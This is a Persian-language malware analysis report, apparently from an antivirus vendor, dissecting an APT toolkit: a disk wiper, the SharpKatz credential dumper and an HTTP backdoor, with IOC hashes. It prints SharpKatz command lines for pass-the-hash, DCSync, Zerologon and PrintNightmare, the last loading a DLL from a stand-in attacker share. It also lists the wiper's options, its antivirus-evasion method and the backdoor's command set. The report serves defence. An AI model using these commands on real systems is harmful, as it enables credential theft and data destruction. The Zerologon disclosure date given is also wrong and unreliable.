HackTool.Win32.APT- PS

1 جزئیات فنی

1.1 ماژول‌ها و توالی عملیات بدافزار

این بدافزار شامل ماژول‌های بسیاری اعم از برنامه اجرایی و اسکریپت‌های مختلف است که هر یک وظیفه کوچک خود را برعهده دارند.

تصویر 1ماژول‌های بدافزار

در ادامه لیست فایل‌های بدافزار به همراه شرح مختصری از عملکرد آنها را مشاهده می‌کنید.

نام فایل

توضیحات

wint.bat

اجرای تسک زمانبند جهت اجرای سرویس فایل msdskint.exe

msdskint.exe

تخریب اطلاعات هارددیسک (Wipe)، تغییر رمزعبور کاربران، حذف فایل‌های پشتیبان ویندوز و

Sharpk.exe

ابزاری جهت بازیابی اطلاعات اعتبارسنجی کاربران

uhsvc.exe

به عنوان Httpservice جهت ارتباط با سرورهای c&c، هکر با استفاده از این فایل اقدام به کپی ابزار Sharpk.exe نیز نموده است.

Lastfile

محتوی مسیر آخرین فایل تخریب شده

جدول 1 شرع مختصر عملکرد پی لودهای بدافزار

1.1.1  شرح عملیات فایل sharpk.exe

این ابزار در Github منتشر شده است و ماژول Sekurlsa و lsadump از mimikatz را پیاده سازی می‌کند. Sharpkatz جهت کشف اطلاعات کاربری از هاست‌های مبتنی بر ویندوز مورد استفاده قرار می‌گیرد.

این ابزار از چندین ماژول تشکیل شده است که برای عملکردهای مختلف حمله طراحی شده‌اند. برخی از ماژول‌های رایج و مورد استفاده عبارتند از:

MSV,Kerberos,TSPKG,Windows Credential Manager,Wdigest

ماژول‌های اصلی که توسط این ابزار قابل اجرا هستند به شرح زیر می‌باشد:

  • Lsadump

این ماژول جهت استخراج هش یک کاربر خاص مورد استفاده قرار می‌گیرد.

  • Pth

با هش یک کاربر خاص از تمامی دسترسی‌ها جهت سرقت نام کاربری و رمز عبور استفاده می‌کند. این ماژول برای درست کار کردن نیاز به دسترسی Admin ندارد و یک کاربر عادی نیز می‌تواند این ماژول را اجرا کند.

  • LogonPasswords

اطلاعات اعتبارسنجی کاربرانی که اخیراً وارد سیستم شده‌اند را نمایش می‌دهد.

  • Zerologon (جهت سرقت اطلاعات مربوط به اکتیو دایرکتوری)

آسیب‌پذیری Zerologon یا CVE-2020-1472 یکی از این آسیب‌پذیری‌هایی می‌باشد که خبر آن برای اولین بار در سپتامبر 2021 منتشر شد. این آسیب‌پذیری که به دلیل شیوه‌ی پیاده‌سازی رمزنگاری توسط مایکروسافت در پروسس Netlogon به وجود آمده، این قابلیت را به مهاجمین می‌دهد تا به سرورهای ویندوزی و به خصوص سرورهای اکتیو دایرکتوری حمله کرده و اطلاعات آن را به سرقت برند.

  • DCSync

ماژول DCSync در sharpkatz به مهاجم اجازه می‌دهد وانمود کند که یک کنترل‌کننده دامنه است و هش رمز عبور را از کنترل‌کننده‌های دامنه دیگر بازیابی می‌کند، بدون اینکه کدی را روی هدف اجرا کند.

در جدول زیر نیز لیست آرگومان‌های قابل دریافت توسط فایل sharpk.exe به همراه عملکرد آنها آورده شده است.

آرگومان ورودی شرح عملکرد

–Command ekeys

لیست کلیدهای رمزگذاری kerberos را نمایش می‌دهد (kerberos پروتکلی برای احراز هويت در شبكه است)

–Command msv

بازیابی اطلاعات اعتبارسنجی‌های کاربر از msv شامل اطلاعات logons, batch logons, و service logons

–Command kerberos

بازیابی اطلاعات اعتبارسنجی‌های کاربر از kerberos

–Command tspkg

بازیابی اطلاعات اعتبارسنجی‌های کاربر از tspkg

–Command credman

بازیابی اطلاعات اعتبارسنجی‌های کاربر از credman

–Command wdigest

بازیابی اطلاعات اعتبارسنجی‌های کاربر از wdigest

–Command logonpasswords

بازیابی اطلاعات اعتبارسنجی‌های کاربر از logonpasswords

–Command listshadows

نمایش لیست نسخه‌های پشتیبان سیستم

–Command dumpsam –System syspath –Sam sampath

گرفتن دامپ از اطلاعات اعتبارسنجی‌های داخل پایگاه داده‌ی SAM

–Command pth –User username –Domain userdomain –NtlmHash ntlmhash

ایجاد فرآیندی تحت اعتبار دامنه کاربری یا نام کاربری به وسیله‌ی هش ntlm رمز کاربر

–Command pth –User username –Domain userdomain –Rc4 rc4key

ایجاد فرآیندی تحت کلید rc4 اعتبار دامنه کاربری یا نام کاربری

–Command pth –Luid luid –NtlmHash ntlmhash

هش ntlm را برای یک Logonsession موجود جایگزین می‌کند.

–Command pth –User username –Domain userdomain –NtlmHash ntlmhash –aes256 aes256

ایجاد فرآیندی تحت اعتبار دامنه کاربری یا نام کاربری به وسیله‌ی هش ntlm رمز کاربر و هش ntlm کلید aes256

–Command dcsync –User user –Domain userdomain –DomainController dc

گرفتن دامپ از اطلاعات اعتبارسنجی‌های کاربر توسط نام کاربری

–Command dcsync –Guid guid –Domain userdomain –DomainController dc

گرفتن دامپ از اطلاعات اعتبارسنجی‌های کاربر توسط guid

–Command dcsync –Domain userdomain –DomainController dc

ایجاد فایلی در فولدر temp کاربر جاری، شامل اطلاعات استخراج شده از AD

–Command dcsync –User user –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword

گرفتن دامپ از اطلاعات اعتبارسنجی‌های کاربر توسط نام کاربری با استفاده از اطلاعات اعتبارسنجی‌های جایگزین

–Command dcsync –Guid guid –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword

گرفتن دامپ از اطلاعات اعتبارسنجی‌های کاربر توسط نام کاربری با استفاده از guid

–Command dcsync –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword

ایجاد فایلی در فولدر temp کاربر جاری، شامل اطلاعات استخراج شده از ADتوسط اطلاعات اعتبارسنجی جایگزین

–Command zerologon –Mode check –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$

بررسی وجود آسیب‌پذیری Zerologon در سیستم

–Command zerologon –Mode exploit –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$

نفوذ با استفاده از آسیب‌پذیری zerologon

–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ –Domain testlab2.local –User krbtgt –DomainController WIN-NSE5CPCP07C.testlab2.local

نفوذ با استفاده از آسیب‌پذیری zerologon و گرفتن دامپ از اعتبار نامه کاربر به وسیله‌ی نام کاربری

–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ –Domain testlab2.local –Guid guid –DomainController WIN-NSE5CPCP07C.testlab2.local

نفوذ با استفاده از آسیب‌پذیری zerologon و گرفتن دامپ از اعتبارنامه کاربر به وسیله‌ی GUID

–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ –Domain testlab2.local –DomainController WIN-NSE5CPCP07C.testlab2.local

نفوذ با استفاده از آسیب‌پذیری zerologon و ایجاد فایلی در فولدر temp کاربر جاری، شامل اطلاعات استخراج شده از AD توسط اعتبارنامه جایگزین

–Command printnightmare –Target dc –Library \\\\mycontrolled\\share\\fun.dll

نفوذ با استفاده از آسیب‌پذیری PrintNightmare

–Command printnightmare –Target dc –Library \\\\mycontrolled\\share\\fun.dll –AuthUser user –AuthPassword password –AuthDomain dom

نفوذ با استفاده از آسیب‌پذیری PrintNightmare و اعتبار ارائه شده

جدول 2 شرح دستورات ابزار Sharpkatz

1.1.2 شرح عملیات تسک NETWSM.

این تسک زمانبند وظیفه اجرای فایل wint.bat را برعهده دارد.

c:\programdata\pcmr\wint.bat

1.1.3 شرح عملیات فایل wint.bat

این فایل اجرا کننده سرویس Wiper بدافزار می‌باشد. سرویسی با نام جعلی Windows Taks Scheduler که همانطور که در نام سرویس مشخص است، به جای کلمه “Tasks” از کلمه “Taks” استفاده شده است. فایل Wiper با نام msdskint.exe در سیستم‌های مختلف در مسیرهای زیر دیده شده است:

سیستم HGH-HGH-KHSRAVI:

c:\windows\ccmcache\6\msdskint.exe

سایر سیستم‌ها:

c:\programdata\pcmr\msdskint.exe

1.1.4 شرح عملیات فایل msdskint.exe

این فایل، Wiper ایجاد شده توسط هکر می‌باشد که می‌تواند آرگومان‌هایی از ورودی دریافت کند. در صورتی که هیچ آرگومان ورودی وارد نشده باشد نیز فایل مذکور دارای آرگومان‌های از پیش تعریف شده می‌باشد که از همان‌ها در طول اجرا استفاده می‌کند.

هکر این فایل را با استفاده از ابزار “Eziriz .NET Reactor” پک کرده است. با این مقصود که کد بدافزار از دید تحلیلگر و آنتی‌ویروس مخفی بماند. در ادامه شرح عملیات بدافزار بعد از دیکد برنامه شرح داده شده است.

در جدول زیر لیست آرگومان‌های قابل دریافت توسط فایل msdskint.exe به همراه عملکرد آنها آورده شده است.

آرگومان ورودی شرح عملکرد
-wipe-exclude مسیرهایی که بعد از این آرگومان قرار گرفته شده به لیست استثنائات بدافزار اضافه می‌شود تا عملیات تخریب (Wipe) بر روی آنها انجام نگیرد.
-light-wipe تعداد دفعاتی که بافر مورد نظر بدافزار جهت تخریب روی فایل‎‌های سیستم قربانی نوشته می‌شود.
-sessions سبب می‌شود تمامی Sessionهای اکتیو سیستم Logoff و ریستارت شوند.
-delete-users اکانت کاربران وارد شده به همراه این آرگومان از سیستم حذف می‌شوند.
-shadows تمامی نسخه‌های پشتیبان گرفته شده از اطلاعات سیستم پاک می‌شوند.
-start-iis سرویس iis استارت می‌شود.
-config عملیاتی تعریف نشده است.
-processes پردازه‌های وارد شده به همراه این آرگومان خاتمه پیدا می‌کنند.
Logs- بدافزار با استفاده از ابزار wevtutil.exe ویندوز و Enum همه لاگ‌های سیستم عامل، تمام لاگ‌های Event viewer را پاک می‌کند.
-delete در صورت وارد شدن این آرگومان، فایل‌هایی که wipe می‌شوند در نهایت از سیستم حذف می‌شوند. (تابع Win32Native.DeleteFile ویندوز اجرا می‌شود)
-break-users تغییر کلمه عبور کاربران سیستم قربانی
-wipe-only تنها فایل‌های موجود در مسیرهایی که وارد شده تخریب می‌شوند.
-purge به معنی پاکسازی کامل می‌باشد که در آن روند تخریب محتوای فایل با روند معمولی متفاوت است.
-passwords عملیاتی تعریف نشده است.
-wipe-all تخریب اطلاعات کلیه درایوهای سیستم
-stop-iis سرویس iis متوقف می‌شود.

جدول 3 شرح دستورات بدافزار Wiper

در ادامه به شرح تفصیلی هر یک از آرگومان‌هایی که نیاز به توضیح بیشتر دارند می‌پردازیم.

  • آرگومان break-users

اگر این آرگومان وارد شده باشد و کاربری مشخص شده باشد، بدافزار به ازای هر یک از اکانت‌های تعریف شده در سیستم یک کلمه عبور ست می‌کند. این کلمه عبور رشته ثابت “S7Y1a82R!می‌باشد.

تصویر 2 تغییر کلمه عبور کاربران توسط بدافزار

  • آرگومان  purge

این آرگومان در هنگام عمل Wipe بر روی فایل‌ها مورد استفاده قرار می‌گیرد. به طور کلی مقداری که بدافزار برای تخریب (Wipe) اطلاعات در نظر می‌گیرد، یک بافر 200 بایتی است که محتوای آن طی یک الگوریتم به صورت تصادفی ساخته می‌شود.

اگر آرگومان purge وارد شده باشد، مقداری با نام full_purge در کد بدافزار ست می‌شود. این آیتم به معنای پاکسازی کامل برای بدافزار است. در این حالت روال تخریب بدافزار بر روی اطلاعات فایل‌ها به این صورت است که مقدار داخل بافر را در بلاک‌های ۲۰۰ بایتی روی فایل می‌نویسد تا به انتهای فایل برسد.

همچنین بدافزاری لیستی با نام purgeExtensions در کد خود جای داده است، این لیست شامل پسوندهای کاندید مورد نظر هکر می‌باشد. به این صورت که اگر فایلی که قرار است تخریب شود یکی از پسوندهای زیر را داشته باشد، روند تخریب اطلاعات آن فایل همانند روند full_purge خواهد بود.

تصویر 3 پسوندهای کاندید

علاوه بر لیست بالا، رشته‌های دیگری نیز در فایل بدافزار به چشم می‌خورد که می‌توانند به عنوان پسوندهای کاندید در نظر گرفته شوند. این پسوندها عبارتند از:

.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt

  • آرگومان wipe-all-

اگر این آرگومان وارد شده باشد، کل درایوهای فعال سیستم در یک لیست ذخیره می‌شود. سپس همه اطلاعات درایوها wipe می‌شود.

هنگام تخریب اطلاعات، 3 فایل استثناء می‌شوند:

  • default.htm
  • index.htm
  • death_to_raisi.exe

روال تخریب اطلاعات توسط بدافزار در صورتی که مقدار full_purge ست نشده باشد یا پسوند فایل‌ها جزء پسوندهای کاندید نباشد به این صورت است که ابتدا به اندازه 200 بایت بافر تعیین شده از آفست صفر روی فایل می‌نویسد. سپس کل سایز فایل را بر 1024 تقسیم می‌کند. این مقدار را در متغیر num4 ذخیره می‌کند.

اگر برای آرگومان light_wipe عدد وارد شده باشد، مینیمم مقدار بین light_wipe و num4 را محاسبه می‌کند و در num4 می‌نویسد.

سپس به اندازه num4 بار از آفست جاری 1024 بایت (0X400) فاصله می‌اندازد و روی 200 بایت بعدی همان مقدار را می‌نوسید و به همین ترتیب ادامه می‌دهد تا به انتهای فایل برسد. در نهایت فایل lastfile2 را در پوشه فایلی که تخریب شده می‌سازد و مسیر فایل را در آن یادداشت می‌کند.

همانطور که قبلا اشاره شد، فایل msdskint.exe در صورتی که آرگومانی به عنوان ورودی دریافت نکند نیز آرگومان‌های از پیش تعریف شده دارد. این فایل در صورتیکه تحت سرویس اجرا شود دارای آرگومان‌های پیش‌فرض زیر خواهد بود:

تصویر 4 لیست رشته‌ها به عنوان آرگومان ورودی

با توجه به این آرگومان‌ها، این سرویس به صورت زیر عمل خواهد کرد:

1. مقدار light-wipe- برابر 3 می‌باشد. به این معنی که بافر تخریب اطلاعات 3 بار بروی هر فایل نوشته می‌شود.

2. سرویس iis متوقف می‌شود.

3. تمامی لاگ‌های EventViewer سیستم عامل ویندوز پاک می‌شوند.

4. تمامی نسخه‌های پشتیبان پاک می‌شوند.

5. مقدار processes برابر sql* می‌باشد. به این معنی که تمامی پردازه‎‌هایی که در نام آن‌ها رشته sql آمده باشد خاتمه می‌یابند.

6. تمامی اطلاعات درایوهای فعال به استثنای مسیرهای exclude شده تخریب می‌شود.

7. مسیرهای استثناء شده (exclude) توسط هکر به شرح زیر می‌باشند:

"C:\Windows"

"C:\$Recycle.Bin"

"C:\$WinREAgent"

"C:\Config.Msi"

"C:\MSOCache"

"C:\Recovery"

"C:\Program Files\IBM\*"

"C:\System Volume Information"

"C:\Program Files\dotnet"

"C:\Program Files (x86)\dotnet*"

"C:\Program Files\Symantec*"

"C:\Program Files (x86)\Symantec*"

"C:\Program Files (x86)\Padvish*"

"C:\Program Files\Kaspersky*"

"C:\Program Files (x86)\Kaspersky*"

"C:\Program Files\Microsoft*"

"C:\Program Files (x86)\Microsoft*"

"C:\Program Files\Windows*"

"C:\Program Files (x86)\Windows*"

در دستورات برنامه تابعی وجود دارد که نشان می‌دهد هکر به آنتی ویروس پادویش حساس بوده است. به عنوان مثال همانگونه که در تصویر 5 مشاهده می‌شود، بدافزار لیست پردازه‌های در حال اجرا روی سیستم را رصد می‌کند. در صورتی که در میان این پردازه‌ها، سرویس پادویش یا UI آن بالا باشد، بدافزار به جای اجرای تابع پیش فرض خود برای Wipe اطلاعات، تلاش می‌کند عملیات wipe را از طریق دیگری انجام دهد.

به نظر می‌رسد علت این تغییر تاکتیک از طرف بدافزار، فرار از سیستم شناسایی رفتاری پادویش است که روش wipe اطلاعات آن را تشخیص داده و آن را بلافاصله به صورت خودکار متوقف می‌کند؛ اما در هر صورت روش دوم بدافزار نیز توسط پادویش شناسایی و متوقف می‌شود.

در روش دوم بدافزار سعی می‌کند به ازای هر یک از فایل‌های سیستم، یک فایل bat موقت (tmp.bat) بسازد و برای این فایل‌های موقت دو تسک زمانبند با مجوز سیستم ایجاد می‌کند.

تصویر 5 جستجوی سرویس و UI آنتی ویروس پادویش توسط بدافزار

تصویر 6 تغییر روش تخریب اطلاعات توسط بدافزار بعد از یافتن سرویس آنتی ویروس پادویش

در نمونه زیر مثالی از فایل bat ساخته شده را مشاهده می‌کنید:

تصویر 7 نمونه ای از فایل bat ساخته شده جهت تخریب اطلاعات

همانطور که در محتوای این فایل bat مشخص است، ابتدا بدافزار با استفاده از ابزار fsutil سیستم‌عامل ویندوز یک فایل با محتوای null به اندازه حجم فایلی که می‌خواسته تخریب کند (در اینجا 3072 بایت) با پسوند qipe. ساخته است. سپس قصد داشته است این فایل ساختگی را جایگزین فایل اصلی نماید.

در واقع هکر با علم به این که آنتی‌ویروس پادویش توانایی جلوگیری از تخریب اطلاعات سیستم را دارد، سعی داشته است از راه دیگری با استفاده از ابزارهای استاندارد سیستم برای حذف اطلاعات استفاده کند. با این وجود مولفه ضدباجگیر پادویش باز هم از وقوع این نوع حمله جلوگیری کرده است.

در کد برنامه دستوراتی وجود دارد که نشان می‌دهد این بدافزار می‌تواند، در زمان انجام عملیات لاگ زمان اجرای برنامه را به صورت زیر ذخیره کند:

در کد بدافزار رشته‌هایی با عناوین “– Excluded” ، “– Skipped” ، “BreakSelectedUsers” ، “DeleteSelectedUsers” ، “KillProcesses” و … به چشم می‌خورد. در هنگام خاتمه عملیات نیز این لاگ با رشته “Finished on ” و ثبت زمان پایان می‌یابد. با این وجود هکر ظاهراً نیازی به ذخیره لاگ با استفاده از فایل Wiper نداشته است. زیرا کدی برای تابع Output که وظیفه چاپ نتیجه عملیات را بر عهده داشته، در نظر گرفته نشده است.

1.1.5 شرح عملیات فایل uhsvc.exe

این فایل به عنوان httpservice برای هکر عمل می‌کند. اطلاعات مربوط به دستورات مورد نظر هکر در دو فایل uhsvc.exe.start و uhsvc.exe.ini ذخیره شده است.

این سرویس که با نام Microsoft Update Health Host در سیستم ثبت شده است، دارای کامندهایی جهت دانلود و آپلود فایل و همچنین ارتباط با پایگاه داده sql و ارسال نتایج به سرور مخرب و دستکاری فایل‌های محلی می‌باشد. نسخه‌های مختلفی از این httpservice یافت شده است که عبارتند از 0.1.3vXH و 0.1.4vXH. این نسخه‌ها در عملکرد کلی تفاوتی ندارند و دستورات یکسانی را می‌پذیرند.

این فایل همانند فایل Wiper هکر با استفاده از ابزار “Eziriz .NET Reactor” پک شده است. نتایج زیر با توجه به موارد مشاهده شده بعد از دیکد دستورات به دست آمده است:

1. بدافزار پس از آنکه تحت سرویس اجرا شد، یکtcpListener در سیستم قربانی ایجاد می‌کند. در ادامه یکی از نسخه‌های بدافزار که از پورت 9399 استفاده می‌کند تشریح می‌گردد. در نمونه‌های که از فایل uhsvc.exe.start یافته شده است، هکر پکت‌های ورودی به پورت 9399 را از خارج از شبکه به سیستم قربانی در فایروال مجاز کرده است.

تصویر 8 محتوای فایل uhsvc.exe.start

2. بدافزار قابلیت دریافت دستورات متفاوت از سرور هکر و اجرای آنها را دارد. بدافزار این دستورات را توسط ابزار cmd اجرا می‌کند.

تصویر 9 اجرای فرامین مورد نظر هکر توسط شل

3. استفاده از توابع sqlConnection و sqlCommand جهت اجرای کوئری‌های مختلف بر روی پایگاه داده SQL

4. ایجاد فایل

تصویر 10 ایجاد فایل توسط هکر از طریق بدافزار

5.بدافزار قابلیت zip و unzip محتویات دایرکتوری‌ها، دانلود/آپلود و در صورت لزوم حذف فایل‌های مورد نظر هکر را دارد. این بدافزار جهت فشرده‌سازی فایل‌ها از کتابخانه IonicZip استفاده می‌کند.

تصویر 11 قابلیت فشرده سازی/بازگشایی و حذف فایل

تصویر 12– امکان دستکاری محتوای دایرکتوری‌ها

6. قابلیت دریافت آدرس پراکسی مورد نظر سرور برای ارتباط با آن از طریق دستورات “p=” و “b=”

تصویر 13 – دستورات مربوط به پراکسی

تصویر 14 – تنظیم پراکسی

7. امکان نمایش نسخه بدافزار برای هکر (هکر از چند نسخه Httpservice برای پیاده‌سازی عملیات خود استفاده کرده است).

تصویر 15 – نمایش نسخه بدافزار

8. امکان نمایش مسیر جاری فایل بدافزار (مسیر بدافزار “c:\programdata\pcmr\uhsvc.exe” بوده است).

9. امکان ایجاد فایل log و ارسال آن برای نمایش خطاهای احتمالی به هکر

تصویر 16 – ساخت فایل log

تصویر 17 – فایل log

در جدول زیر لیست عملیاتی که توسط بدافزار پشتیبانی می‌شود، نمایش داده شده است:

عملکرد

دستور

Shellexecute with #zip support

a_1=s

Run SQL commands

a_1=c

View output and error logs and delete them

a_1=i1

Delete output and error logs

a_1=i2

Run cmd interactively

a_1=i

Shellexecute

Cmd=

Show Malware path

W_i

Show Malware Version

V_i

Act as a proxy and forward connection to another website/infected node

P= OR b=

Write any file

M=afe=1

Run SQL commands

Con=

File Manager (Browse directories, Download/Upload Files, …)

Prt=

Read/Write based on GET

other

جدول 4 دستورات وب سرویس بدافزار

راهکارهای مقابله با بدافزار

همه نمونه‌های شناخته شده این بدافزار با اسامی HackTool.Win32.HTTPbackdoor ،HackTool.Win32.SharpKatz و Trojan.Win32.QWipe توسط پادویش شناسایی می‌شوند.

به علاوه، ویژگی منحصر به فرد محافظت اطلاعات پادویش با تشخیص عملکرد Wipe توسط این بدافزار، مانع از تخریب اطلاعات توسط بدافزار شده و به اجرای آن خاتمه می‌دهد.

نشانه‌های آلودگی (IOC)

نام فایل

MD5

uhsvc.exe

466832ef3f81f1cc37466be9e1b7c4d2

9fbab064ec583f80dc15e1abc2ebcad3

2529ed634df912d95d52be717560b0b6

cc97e34cf19f56263abd0f89e907cf7a

66e6d3b03613074f38b2a6acff8e8229

94354ecf588835cea2352b873211290e

af029e3168e27394020b3f4315b2419b

2c1e86a5c5c5ad19d64baa66e78af6f1

e633f5ce289cdcbdee93b7c02178fa35

4cc3665c4fb23ace6b0f9b396c66f8e6

uhsvc.exe.start

381d8239561c3714c1b71f0c2df4f57e

msdskint.exe

13e7caebf00dd2315885e1f47030eb3c

wint.bat

0aa3b91d584803a39250742b69173841

Sharpk.exe

3ea25f166bef1bf79c374f16f2e4e29f